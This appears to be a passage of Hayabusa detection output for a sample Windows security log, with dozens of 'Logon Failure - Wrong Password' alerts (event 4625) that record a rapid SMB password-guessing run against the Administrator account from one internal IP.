+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: 
